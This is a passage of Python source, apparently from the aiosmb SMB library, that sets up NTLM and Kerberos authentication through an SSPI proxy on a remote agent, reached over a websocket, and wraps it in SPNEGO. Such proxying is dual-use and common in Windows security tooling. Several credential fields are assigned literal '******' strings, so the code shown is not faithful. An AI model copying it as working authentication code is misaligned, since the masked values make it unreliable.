                ntlmcred = SMBSSPIProxyCredential()
                ntlmcred.type = 'NTLM'
                if creds.username is not None:
                    ntlmcred.username = '******'
                if creds.domain is not None:
                    ntlmcred.domain = '<CURRENT>'
                if creds.secret is not None:
                    ntlmcred.password = '******'
                ntlmcred.is_guest = False
                ntlmcred.host = creds.settings['host'][0]
                ntlmcred.port = int(creds.settings['port'][0])
                ntlmcred.proto = 'ws'
                if 'proto' in creds.settings:
                    ntlmcred.proto = creds.settings['proto'][0]
                if 'agentid' in creds.settings:
                    ntlmcred.agent_id = bytes.fromhex(
                        creds.settings['agentid'][0])

                handler = SMBSSPIProxyNTLMAuth(ntlmcred)
                spneg = SPNEGO()
                spneg.add_auth_context(
                    'NTLMSSP - Microsoft NTLM Security Support Provider',
                    handler)
                return spneg

            elif creds.authentication_type == SMBAuthProtocol.SSPIPROXY_KERBEROS:
                from aiosmb.authentication.kerberos.sspiproxy import SMBSSPIProxyKerberosAuth

                ntlmcred = SMBSSPIProxyCredential()
                ntlmcred.type = 'KERBEROS'
                ntlmcred.target = creds.target
                if creds.username is not None:
                    ntlmcred.username = '******'
                if creds.domain is not None:
                    ntlmcred.domain = '<CURRENT>'
                if creds.secret is not None:
                    ntlmcred.password = '******'
                ntlmcred.is_guest = False
                ntlmcred.host = creds.settings['host'][0]
                ntlmcred.port = int(creds.settings['port'][0])
                ntlmcred.proto = 'ws'
                if 'proto' in creds.settings:
                    ntlmcred.proto = creds.settings['proto'][0]
                if 'agentid' in creds.settings:
                    ntlmcred.agent_id = bytes.fromhex(
                        creds.settings['agentid'][0])

                handler = SMBSSPIProxyKerberosAuth(ntlmcred)
                #setting up SPNEGO
                spneg = SPNEGO()
                spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5',
                                       handler)
                return spneg